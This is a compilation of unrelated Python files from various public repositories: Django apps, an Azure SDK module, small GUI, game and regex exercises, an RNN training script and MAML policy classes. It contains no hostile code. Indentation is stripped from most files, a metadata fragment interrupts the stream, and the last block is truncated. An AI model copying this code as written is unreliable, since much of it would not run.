# ===== /Python_codes/p03588/s910432178.py | Aasthaengg/IBMdataset (no license) =====
import sys
def solve():
readline = sys.stdin.buffer.readline
mod = 10 ** 9 + 7
n = int(readline())
ab = [list(map(int, readline().split())) for _ in range(n)]
ab.sort()
print((ab[-1][0] - ab[0][0] + 1) + (ab[0][0] - 1) + (ab[-1][1]))
if __name__ == '__main__':
solve()
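
# Sketch of exercising solve() locally: the judge supplies N and then N "a b"
# pairs on stdin (the sample values below are hypothetical):
#   $ printf '2\n1 3\n5 2\n' | python s910432178.py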

# ===== /iGottaDjango/urls.py | Stephanie-Spears/iGottaDjango (no license) =====
"""iGotta URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^polls/', include('polls.urls')),
url(r'^admin/', admin.site.urls),
]

# ===== /python/day6/if_elif_0.py | itcsoft/itcpython (no license) =====
san = int(input('Сан бериниз мен ошол санды текст менен чыгарам: '))
if san == 0:
print('Ноль')
elif san == 1:
print('Бир')
elif san == 2:
print('Эки')
elif san == 3:
print('Уч')
elif san == 4:
print('Торт')
elif san == 5:
print('Беш')
elif san == 6:
print('Алты')
| [
"[email protected]"
] | |
702e397972e162ab5ddf2af196684a76f393bd61 | 71673d845952b50986d1c21dc5bbbcab2a2a2651 | /introduction_to_lxml.py | 0783fcf78d6a6982eff93f7b0558518976c20d60 | [] | no_license | afcarl/introductionToWebScraping | 77a44bfb7655e44231bed216d37b015e3cf52a5c | d1039aeee87365f2807dd198e53bd1bb6224a550 | refs/heads/master | 2020-03-26T04:23:54.052825 | 2015-06-18T14:23:40 | 2015-06-18T14:23:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 507 | py | import requests
import lxml.html
base_url = "https://www.google.com"
def scrape(url,base_url,depth):
if depth == 0:
return True
r = requests.get(url)
html = lxml.html.fromstring(r.text)
links = html.xpath("//a/@href")
for ind,link in enumerate(links):
if "http" in link:
print link
else:
print base_url+link
links[ind] = base_url+link
for link in links:
scrape(link,base_url,depth-1)
scrape(base_url,base_url,5)
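
# Sketch: the same crawl with a visited set so duplicate links are fetched only
# once (hypothetical helper, not part of the original script):
def scrape_once(url, base_url, depth, seen=None):
    seen = seen if seen is not None else set()
    if depth == 0 or url in seen:
        return
    seen.add(url)
    r = requests.get(url)
    for link in lxml.html.fromstring(r.text).xpath("//a/@href"):
        full = link if "http" in link else base_url + link
        scrape_once(full, base_url, depth - 1, seen)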

# ===== /to_do_list/tasks/helper_functions.py | arnaudblois/to_do_list (MIT) =====
# -*- coding: utf-8 -*-
"""
Helper functions for the tasks app: calculate_reputation_gain and
give_reputation_reward.
"""
from .models import Profile, Task
from django.db.models import F
def calculate_reputation_gain(task):
"""
Calculate the reputation gained by completing a task. Currently based on
difficulty only.
"""
DIFF = Task.DIFFICULTIES
d = task.difficulty
if d == DIFF.trivial:
return 1
if d == DIFF.easy:
return 5
if d == DIFF.OK:
return 10
if d == DIFF.hard:
return 25
if d == DIFF.heroic:
return 100
if d == DIFF.nightmare:
return 500
def give_reputation_reward(task):
"""
Add the reputation reward to the profile of the user who completed the
task.
"""
reward = calculate_reputation_gain(task)
profile = Profile.objects.get(user=task.completed_by)
profile.reputation = F('reputation') + reward
profile.save()
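
# Usage sketch (hypothetical Task row): the F('reputation') expression above makes
# the increment happen in SQL, so two concurrent completions cannot overwrite
# each other:
#   give_reputation_reward(Task.objects.get(pk=1))
#   profile.refresh_from_db()  # re-read before using the updated value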

# ===== /models.py | ProductionsAutrementDit/PortalSynonymPlugin (no license) =====
from django.db import models
class Synonym(models.Model):
value = models.CharField(max_length=255)
    parent = models.ForeignKey("self", related_name="synonyms", on_delete=models.CASCADE, blank=True, null=True)  # max_length removed: it is a CharField option, not a ForeignKey one
class Meta:
ordering = ['value']
class TagField(models.Model):
fieldname = models.CharField(max_length=255)
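
# Usage sketch (hypothetical rows) for the self-referencing Synonym model:
#   rocket = Synonym.objects.create(value="rocket")
#   Synonym.objects.create(value="launcher", parent=rocket)
#   rocket.synonyms.all()  # children via related_name="synonyms"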

# ===== /sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/aio/operations/_usages_operations.py
# ===== test-repo-billy/azure-sdk-for-python (MIT / LGPL-2.1-or-later / LicenseRef-scancode-generic-cla) =====
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._usages_operations import build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class UsagesOperations:
"""UsagesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.signalr.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
location: str,
**kwargs: Any
) -> AsyncIterable["_models.SignalRUsageList"]:
"""List resource usage quotas by location.
:param location: the location like "eastus".
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SignalRUsageList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.signalr.models.SignalRUsageList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SignalRUsageList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
location=location,
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
location=location,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("SignalRUsageList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.SignalRService/locations/{location}/usages'} # type: ignore
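
# Usage sketch, assuming the generated SignalRManagementClient wires this group
# up as `client.usages` (credential and subscription are placeholders):
#   async for usage in client.usages.list(location="eastus"):
#       print(usage.name, usage.current_value, usage.limit)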

# ===== /scrollbar.py | supriadi-yusuf/python-GUI (no license) =====
from tkinter import (
Tk, RIGHT, Y, Scrollbar, Listbox, END, BOTH, LEFT
)
layar=Tk()
layar.title("Scrollbar")
myScrollbar = Scrollbar(master=layar)
#myScrollbar.pack(side=RIGHT, fill=Y)
#myScrollbar.pack(side=LEFT, fill=Y)
myList = Listbox(master=layar,
#height=5,
yscrollcommand=myScrollbar.set)
for line in range(100):
myList.insert(END, "This is line number " + str(line))
#myList.pack(side=LEFT,fill=BOTH)
myList.pack(side=LEFT,fill=Y)
myScrollbar.pack(side=LEFT, fill=Y)
myScrollbar.config(command=myList.yview)
layar.mainloop()
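
# The wiring above is a two-way handshake: the listbox reports its visible
# fraction through yscrollcommand=myScrollbar.set, and the scrollbar drives the
# view through command=myList.yview. The same pattern for a Text widget (sketch):
#   text = Text(layar, yscrollcommand=myScrollbar.set)
#   myScrollbar.config(command=text.yview)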

# ===== /scripts/example_numbercounting.py | ghl3/histfactoryUnitTests (no license) =====
#!/usr/bin/env python
#
# A pyROOT script demonstrating
# an example of writing a HistFactory
# model using python
#
# This example was written to match
# the example.xml analysis in
# $ROOTSYS/tutorials/histfactory/
#
# Written by George Lewis
#
#
# There are several way to use HistFactory to
# create a model.
#
# In this example, the model is configured and built
# entirely within this script. It requires no external
# configuration files or any saved histograms.
#
def main():
try:
import ROOT
except:
print "It seems that pyROOT isn't properly configured"
return
"""
Create a HistFactory measurement from python
"""
# Create and name a measurement
meas = ROOT.RooStats.HistFactory.Measurement("meas", "meas")
#meas.SetOutputFilePrefix( "./results/example_UsingPy_SetVal" )
# Set the Parameter of interest, and set several
# other parameters to be constant
meas.SetPOI( "SigXsecOverSM" )
meas.AddConstantParam("Lumi")
meas.AddConstantParam("alpha_syst1")
meas.AddConstantParam("alpha_syst2")
meas.AddConstantParam("alpha_syst3")
# Set the Lumi (1.0 = nominal in this example, 10% error)
meas.SetLumi( 1.0 )
meas.SetLumiRelErr( 0.10 )
# Here, this determines if the model is fit
# within the "MakeModelFast" function or not
meas.SetExportOnly( False )
# InputFile = "./data/NumberCounting.root"
# Create a channel and set
# the measured value of data
# (no extenal hist necessar for cut-and-count)
chan = ROOT.RooStats.HistFactory.Channel( "channel1" )
chan.SetData( 20 )
chan.SetStatErrorConfig( 0.05, "Poisson" )
# Create the signal sample and
# set it's value
signal = ROOT.RooStats.HistFactory.Sample( "signal" )
signal.SetValue( 5 )
# Add the parmaeter of interest and a systematic
signal.AddNormFactor( "SigXsecOverSM", 1, 0, 3 )
signal.AddOverallSys( "syst1", 0.95, 1.05 )
chan.AddSample( signal )
# Create a background sample
background1 = ROOT.RooStats.HistFactory.Sample( "background1" )
background1.SetValue( 10 )
background1.SetNormalizeByTheory( True )
# Add a systematic
background1.AddOverallSys( "syst2", 0.95, 1.05 )
chan.AddSample( background1 )
# Create another background sample
background2 = ROOT.RooStats.HistFactory.Sample( "background2" )
background2.SetValue( 4 )
background2.SetNormalizeByTheory( True )
# Add a systematic
background2.AddOverallSys( "syst3", 0.95, 1.05 )
chan.AddSample( background2 )
# Add this channel to the measurement
meas.AddChannel( chan )
# Print some info for debugging
meas.PrintTree()
# Now, do the measurement
    # (leftover from an older API sketch, kept for reference: HistFactory is a
    #  namespace rather than a class, and `measurement` was never defined; the
    #  MakeModelAndMeasurementFast call below does the real work)
    # myFactory = ROOT.RooStats.HistFactory()
    # myWorkspace = myFactory.MakeCombinedModel( meas )
combinedWorkspace = ROOT.RooStats.HistFactory.MakeModelAndMeasurementFast( meas )
#combinedWorkspace = ROOT.RooStats.HistFactory.MakeModelFast( meas )
#combinedWorkspace = ROOT.RooStats.HistFactory.MakeModelFast( meas )
# combinedWorkspace.Print("V")
pass
if __name__ == "__main__":
main()
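
# Sketch: reading the fitted POI back out of the workspace built in main()
# (names follow HistFactory conventions; "SigXsecOverSM" is the POI set above):
#   poi = combinedWorkspace.var("SigXsecOverSM")
#   print(poi.getVal(), poi.getError())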

# ===== /demo/migrations/0005_auto_20210720_1008.py | phuongthao2145/testpython (no license) =====
# Generated by Django 3.1.4 on 2021-07-20 10:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('demo', '0004_testresult_tag'),
]
operations = [
migrations.RenameField(
model_name='demo',
old_name='f0',
new_name='f_status',
),
migrations.RemoveField(
model_name='demo',
name='f1',
),
migrations.RemoveField(
model_name='demo',
name='f2',
),
migrations.RemoveField(
model_name='demo',
name='f3',
),
]
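
# Typical workflow around a generated migration like this one:
#   $ python manage.py makemigrations demo
#   $ python manage.py migrate demo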

# ===== /scripts/misc/config_abl_3dassembly_optimal_bc_loss.py | shagunuppal/mopa-pd (MIT) =====
# for this figure, we need to multiply all y values by 1e6 (y_data = y_data * 1e6) and set
# y-tick labels directly plt.yticks([1.3, 1.4, 1.6, 2.0], fontsize=12).
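
# Sketch of how a plotting script might consume this module (hypothetical reader;
# the wandb run names in plot_labels below are the data sources):
#   import config_abl_3dassembly_optimal_bc_loss as cfg
#   y_data = y_data * 1e6  # per the note above
#   plt.yticks([1.3, 1.4, 1.6, 2.0], fontsize=12)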
filename_prefix = 'SawyerAssembly-Abl-Optimal-BC-Loss'
xlabel = 'Epoch'
ylabel = 'Mean Square Error (x 1e-6)'
max_step = 40
min_y_axis_value = 1e-6
max_y_axis_value = 2e-6
legend = True
data_key = ["Action Prediction Loss (Train)", "Action Prediction Loss (Test)"]
bc_y_value = 0
smoothing = False
smoothing_weight = 0
legend_loc = 'upper right'
wandb_api_path = 'arthur801031/mopa-rl-bc-visual'
num_points = 40
x_scale = 1
divide_max_step_by_1mill = False
build_log_from_multiple_keys = True
limit_y_max = True
limit_y_max_value = 2e-6
plot_labels = {
'Train': ['BC Visual Stochastic_3DAssembly_curious-spaceship-136'],
'Test': ['BC Visual Stochastic_3DAssembly_curious-spaceship-136'],
}
line_labels = {}
line_colors = {
'Train': 'C0',
'Test': 'C1',
}

# ===== /problem_11.py | subenakhatun/pythonbasic (no license) =====
str = 'subena'
print(len(str))

# ===== /coderbyte/letter_capitalize.py | gokou00/python_programming_challenges (no license) =====
def LetterCapitalize(str):
# code goes here
return str.title()
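    # Note: str.title() capitalizes after every non-letter too, so
    # "h3llo yo people" comes back as "H3Llo Yo People".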
print(LetterCapitalize("h3llo yo people"))

# ===== /code/util/datastorage/SPEngine.py | GGXH/DS_stock (no license) =====
import util.status.messager as msg
class SPEngine:
def __init__(self):
        pass  # stub: the original file ends with an empty __init__

# ===== /spray.py | KRHS-GameProgramming-2014/butterfly-game1 (no license) =====
import math,sys,pygame
class Spray():
def __init__(self,player):
self.facing = player.facing
if self.facing == "up":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [0, -5]
elif self.facing == "down":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [0, 5]
elif self.facing == "right":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [5, 0]
elif self.facing == "left":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [-5, 0]
self.rect = self.image.get_rect()
self.damage = 250
self.place(player.rect.center)
self.radius = 500
self.move()
self.living = True
def move(self):
self.rect = self.rect.move(self.speed)
def collideWall(self, width, height):
        if self.rect.left < 0 or self.rect.right > width:
            self.speed[0] = 0  # was self.speedx, which is never defined on Spray
            #print "hit xWall"
        if self.rect.top < 0 or self.rect.bottom > height:
            self.speed[1] = 0  # was self.speedy, which is never defined on Spray
def collideSpray(self, other):
if self != other:
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
if (self.radius + other.radius) > self.distance(other.rect.center):
self.living = False
def collideGust(self, other):
if self != other:
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
if (self.radius + other.radius) > self.distance(other.rect.center):
self.living = False
def place(self, pt):
self.rect.center = pt
def update(self, width, height):
#self.speed = [self.speedx, self.speedy]
self.move()
self.collideWall(width, height)
def distance(self, pt):
x1 = self.rect.center[0]
y1 = self.rect.center[1]
x2 = pt[0]
y2 = pt[1]
return math.sqrt(((x2-x1)**2) + ((y2-y1)**2))
def animate(self):
if self.waitCount < self.maxWait:
self.waitCount += 1
else:
self.waitCount = 0
self.facingChanged = True
if self.frame < self.maxFrame:
self.frame += 1
else:
self.frame = 0
if self.changed:
if self.facing == "up":
self.images = self.upImages
elif self.facing == "down":
self.images = self.downImages
elif self.facing == "right":
self.images = self.rightImages
elif self.facing == "left":
self.images = self.leftImages
self.image = self.images[self.frame]

# ===== /Assignment 4/p4.py | davifrossard/CSC321 (no license) =====
from RNN import *
from utils import print_warning, print_info
from os import path, makedirs
from time import sleep
import datetime, time
# Create results directory
if not path.exists('results/'):
makedirs('results/')
# Data I/O
data = open('shakespeare_train.txt', 'r').read()
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print 'Data has %d characters, %d unique.' % (data_size, vocab_size)
# Hyper-parameters
hidden_size = 250
seq_length = 25
learning_rate = 1e-1
temperature = 1
# Create model
RNN = RNN_Model(hidden_size, chars, temperature)
# Smooth Out loss
smooth_loss = -np.log(1.0/vocab_size)*seq_length
p = 0
n = RNN.get_iter()
print "Training RNN, hit Ctrl+C to stop."
try:
while True:
n += 1
# Create training set from file
inputs = data[p:p+seq_length]
targets = data[p+1:p+seq_length+1]
# Update RNN with data
loss = RNN.update_rnn(inputs, targets, learning_rate)
smooth_loss = smooth_loss * 0.999 + loss * 0.001
# Increment data pointer with wrap-around
if p+2*seq_length+1 < len(data):
p += seq_length
else:
p = 0
RNN.reset_state()
print_warning("[I] Finished pass through file.")
# Show progress
if n % 250 == 0:
print "---------------------------------------------"
st = datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')
print "[%s] Iteration: \t\t%d" % (st, n)
print "\t\t Loss: \t\t\t%7.4f" % smooth_loss
print "\t\t Characters Fed: %d" % p
print "\t\t Sample: \n\n"
print RNN.sample_rnn(data[p], 200)
print "---------------------------------------------\n\n"
except KeyboardInterrupt:
print "Halting training"
#
# ------------------------
# PART 1
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 1\n"
"---------------------\n")
temperatures = [0.1, 0.5, 0.7, 1., 1.5]
for i in temperatures:
samples = []
for j in range(3):
samples.append(RNN.sample_rnn(data[np.random.randint(0, len(data))], 200, i))
samples = '\n-----------------------------------------\n\n'.join(s.rstrip() for s in samples)
print samples
with open('results/samples_%4f.txt' % i, 'w+') as fl:
fl.write(samples)
#
# ------------------------
# PART 2
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 2\n"
"---------------------\n")
samples = []
for i in range(10):
temp = np.random.choice(temperatures[-3::])
samples.append(RNN.complete_phrase("The answer to life the universe and everything is ", temp))
samples = '\n-----------------------------------------\n\n'.join(s.rstrip() for s in samples)
print samples
with open('results/completion.txt', 'w+') as fl:
fl.write(samples)
#
# ------------------------
# PART 3
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 3\n"
"---------------------\n")
RNN.reload_rnn('char-rnn-snapshot.npz')
best_weights = RNN.test_sequence(':', '\n')
init_ix = RNN.char_to_ix[':']
end_ix = RNN.char_to_ix['\n']
with open('results/part3_weights.txt', 'w+') as f:
f.write('Input to State Weights: [%s, %d]\n'
'\t%s\n\n'
'State to Output Weights: [%d, %s]\n'
'\t%s\n\n'
%(best_weights, init_ix,
', '.join((str(w) for w in RNN.Wxh[best_weights, init_ix])),
end_ix, best_weights,
', '.join((str(w) for w in RNN.Why[end_ix, best_weights]))))
#
# ------------------------
# PART 4
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 4\n"
"---------------------\n")
RNN.reload_rnn()
associations = []
for char in sorted(chars):
res = RNN.find_association(char, 1)
association = repr("%s [%2d] -> %s [%2d]" % (char, RNN.char_to_ix[char],
res, RNN.char_to_ix[res]))
print association
associations.append(association)
with open('results/part4_associations.txt', 'w+') as f:
f.write('%s' % '\n'.join(a for a in associations))
RNN.reload_rnn()
best_weights = RNN.test_sequence('S', ':')
init_ix = RNN.char_to_ix['S']
end_ix = RNN.char_to_ix[':']
with open('results/part4_weights.txt', 'w+') as f:
f.write('Input to State Weights: [%s, %d]\n'
'\t%s\n\n'
'State to Output Weights: [%d, %s]\n'
'\t%s\n\n'
%(best_weights, init_ix,
', '.join((str(w) for w in RNN.Wxh[best_weights, init_ix])),
end_ix, best_weights,
', '.join((str(w) for w in RNN.Why[end_ix, best_weights]))))

# ===== /AudioToText.py | suvashsumon/SpeechRecognitionDemo (no license) =====
# Author : Suvash Kumar
# Website : www.suvashkumar.xyz
import speech_recognition as sr
recognizer = sr.Recognizer()
audio_file = "speech.wav"
with sr.AudioFile(audio_file) as source:
audio_data = recognizer.record(source)
print("Recognizing this speech ......")
text = recognizer.recognize_google(audio_data)
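# Sketch with basic error handling: recognize_google calls a web API, so the
# usual failure modes are sr.UnknownValueError and sr.RequestError:
#   try:
#       text = recognizer.recognize_google(audio_data)
#   except sr.UnknownValueError:
#       text = "(speech was unintelligible)"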
print("Content of this audio : ",text)

# ===== /myre.py | tinghe0928/awesome-python3-webapp (no license) =====
import re
# re.compile()
# re.match()
# re.search()
# re.match().group(0) # return to Match object or None, if the first one do not match, fail to match and return None
# re.match().groups() # return to Match object or None, when there is a match, then return the matched one
#re.split()
"""
\d: for a numner
\w: for a character
\s: for space
.: any one character
*: any character include no character
+: at lesat one character
{8}: 8 character
{3:9}: 3 to 9 character
[0-9a-zA-z\_]: match one number/a character/_
[0-9a-zA-z\_]: match at least one number/a character/_
^: mactch the first one
$: match the last one
"""
str_tz = "UTC+8:00"
t_delta = re.match(r'(^UTC)((\+|\-)(\d))(\:\d{2})',str_tz)
print(t_delta.group(0))
print(t_delta.group(2))
print(re.match(r'^\d{3}\-\d{3,8}$', '010-12345').group(0))
print(re.match(r'[\w\,]+', 'a,b, c d').group(0))
print(re.split(r'[\s\,]+', 'a,b, c d'))
print(re.split(r'[t\s]+', 'hththtttthhhh'))
print(re.match(r'^(\w+?)(0*)$', '102334gg0g5500').groups())
"""[email protected]"""
re_rule = re.compile(r'([\w\.]+)@([\w\.]+)com$')
print(re_rule.match('[email protected]').group(0))
print(re_rule.match('[email protected]').group(0))
print(re_rule.search(' [email protected]').group(0))
"""the difference between re.match and re.search"""
print(re.search('www','sam.www.com').group(0))  # 'www': search scans the whole string
print(re.match('www','sam.www.com'))  # None: match anchors at the start, so .group(0) would raise here
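
# Sketch: precompile when a pattern is reused (same idea as re_rule above):
#   www_pat = re.compile(r'www')
#   print(bool(www_pat.search('sam.www.com')))  # True
#   print(bool(www_pat.match('sam.www.com')))   # False: match anchors at position 0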

# ===== /es_maml/policies.py | ishine/google-research (CC-BY-4.0 / Apache-2.0) =====
# coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains policies used in MAML."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
class Policy(object):
r"""Abstract class for different policies \Pi: S -> A.
Class is responsible for creating different policies and provides an interface
for computing actions recommended by policies in different input states.
In particular, this class provides an interface that accepts compressed
vectorized form of the policy and decompresses it.
Standard procedure for improving the parameters of the policy with an
interface given by the class:
policy = policies.ParticularClassThatInheritsFromBaseClass(...)
vectorized_network = policy.get_initial()
while(...):
new_vectorized_network = SomeTransformationOf(vectorized_network)
policy.update(new_vectorized_network)
and SomeTransformationOf is a single step of some optimization procedure such
as gradient descent that sees the policy in the vectorized form.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def update(self, vectorized_parameters):
"""Updates the policy using new parameters from <vectorized_parameters>.
Updates the parameters of the policy using new parameters encoded by
<vectorized_parameters>. The size of the vector <vectorized_parameters>
should be the number of all biases and weights of the neural network.
We use the convention where parameters encoding matrices of connections of
the neural network come in <vectorized_parameters> before parameters
encoding biases and furthermore the order in <vectorized_parameters> of
parameters encoding weights for different matrices/biases-vectors is
inherited from the order of these matrices/biases-vectors in the
decompressed neural network. Details regarding compression depend on
different neural network architectures used (such as: structured and
unstructured) and are given in the implementations of that abstract method
in specific classes that inherit from Policy.
Args:
vectorized_parameters: parameters of the neural network in the vectorized
form.
Returns:
"""
raise NotImplementedError('Abstract method')
@abc.abstractmethod
def get_action(self, state):
"""Returns the action proposed by a policy in a given state.
Returns an action proposed by the policy in <state>.
Args:
state: input state
Returns:
Action proposed by the policy represented by an object of the class in a
given state.
"""
raise NotImplementedError('Abstract method')
@abc.abstractmethod
def get_initial(self):
"""Returns the default parameters of the policy in the vectorized form.
Initial parameters of the policy are output in the vectorized form.
Args:
Returns:
Numpy array encoding in the vectorized form initial parameters of the
policy.
"""
raise NotImplementedError('Abstract method')
@abc.abstractmethod
def get_total_num_parameters(self):
"""Outputs total number of parameters of the policy.
Args:
Returns:
Total number of parameters used by the policy.
"""
raise NotImplementedError('Abstract method')
class BasicTFPolicy(Policy):
"""Basic Policy implemented in Tensorflow."""
def __init__(self, state_dimensionality, action_dimensionality, hidden_layers,
scope):
self.state_dimensionality = state_dimensionality
self.action_dimensionality = action_dimensionality
self.input_ph = tf.placeholder(
dtype=tf.float32, shape=[None, self.state_dimensionality])
self.output_ph = tf.placeholder(
dtype=tf.float32, shape=[None, self.action_dimensionality])
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
self.out = self.input_ph
for i, layer_size in enumerate(hidden_layers):
self.out = tf.layers.dense(
self.out, layer_size, activation=tf.nn.relu, name='h' + str(i))
self.main_out = tf.layers.dense(
self.out, self.action_dimensionality, name='main_out')
self.secondary_out = tf.layers.dense(
self.out, self.action_dimensionality, name='secondary_out')
self.action = tfp.distributions.Normal(
loc=self.main_out, scale=self.secondary_out).sample()
self.loss = tf.losses.mean_squared_error(self.main_out, self.output_ph)
self.obj_tensor = -1.0 * self.loss
self.tf_params = tf.trainable_variables(scope)
self.shapes = [v.shape.as_list() for v in self.tf_params]
self.sizes = [int(np.prod(s)) for s in self.shapes]
self.total_nb_parameters = sum(self.sizes)
self.assign_ph_dict = {
v: tf.placeholder(dtype=tf.float32, shape=v.shape.as_list())
for v in self.tf_params
}
self.assign_ops = []
for v in self.tf_params:
self.assign_ops.append(v.assign(self.assign_ph_dict[v]))
with tf.control_dependencies(self.assign_ops):
# This is needed to input Numpy Params into network temporarily
self.action = tf.identity(self.action)
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.np_params = np.concatenate([
self.sess.run(tf.reshape(tf_param, [-1])) for tf_param in self.tf_params
])
def update(self, flattened_weights):
self.np_params = flattened_weights
def get_action(self, state):
ph_dict = {}
for ind, v in enumerate(self.tf_params):
numpy_flat_val = self.np_params[sum(self.sizes[:ind]
):sum(self.sizes[:ind + 1])]
numpy_reshaped = np.reshape(numpy_flat_val, self.shapes[ind])
v_ph = self.assign_ph_dict[v]
ph_dict[v_ph] = numpy_reshaped
ph_dict[self.input_ph] = state.reshape(-1, self.state_dimensionality)
action_numpy = self.sess.run(self.action, feed_dict=ph_dict)
return action_numpy.flatten()
def get_initial(self):
return self.np_params
def get_total_num_parameters(self):
return self.total_nb_parameters
class DeterministicNumpyPolicy(Policy):
"""Deterministic Policy implemented in Numpy."""
def __init__(self,
state_dimensionality,
action_dimensionality,
hidden_layers,
init_sd=None):
self.state_dimensionality = state_dimensionality
self.action_dimensionality = action_dimensionality
self.layers = hidden_layers + [action_dimensionality]
self.layers.insert(0, state_dimensionality)
self.weights = []
self.biases = []
self.weight_positions = []
self.bias_positions = []
self.init_params = []
flat_pos = 0
for dims in zip(self.layers[:-1], self.layers[1:]):
in_size = dims[0]
out_size = dims[1]
if init_sd is None:
init_sd = np.sqrt(2.0 / (in_size))
init_weights = init_sd * np.random.normal(0, 1, size=(out_size * in_size))
self.init_params.extend(init_weights.tolist())
self.weights.append(np.reshape(init_weights, (out_size, in_size)))
self.weight_positions.append(flat_pos)
flat_pos += out_size * in_size
init_biases = np.zeros(out_size)
self.init_params.extend(init_biases.tolist())
self.biases.append(init_biases)
self.bias_positions.append(flat_pos)
flat_pos += out_size
self.weight_positions.append(flat_pos)
def update(self, flat_weights):
for i, dims in enumerate(zip(self.layers[:-1], self.layers[1:])):
in_size = dims[0]
out_size = dims[1]
start_pos = self.weight_positions[i]
end_pos = start_pos + (out_size * in_size)
self.weights[i] = np.reshape(
np.array(flat_weights[start_pos:end_pos]), (out_size, in_size))
start_pos = self.bias_positions[i]
end_pos = start_pos + out_size
self.biases[i] = np.reshape(
np.array(flat_weights[start_pos:end_pos]), (out_size))
def get_action(self, state):
neuron_values = np.reshape(np.array(state), (self.state_dimensionality))
for i in range(len(self.weights)):
neuron_values = np.matmul(self.weights[i], neuron_values)
neuron_values += self.biases[i]
if i < len(self.weights) - 1:
np.maximum(neuron_values, 0, neuron_values)
np.tanh(neuron_values, neuron_values) # this is sometimes not needed
return neuron_values
def get_initial(self):
return np.array(self.init_params)
def get_total_num_parameters(self):
return self.weight_positions[-1]
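

# A minimal sketch of the update loop described in Policy's docstring, using the
# Numpy policy (the random perturbation stands in for an actual ES/gradient step):
if __name__ == '__main__':
  pol = DeterministicNumpyPolicy(
      state_dimensionality=4, action_dimensionality=2, hidden_layers=[8])
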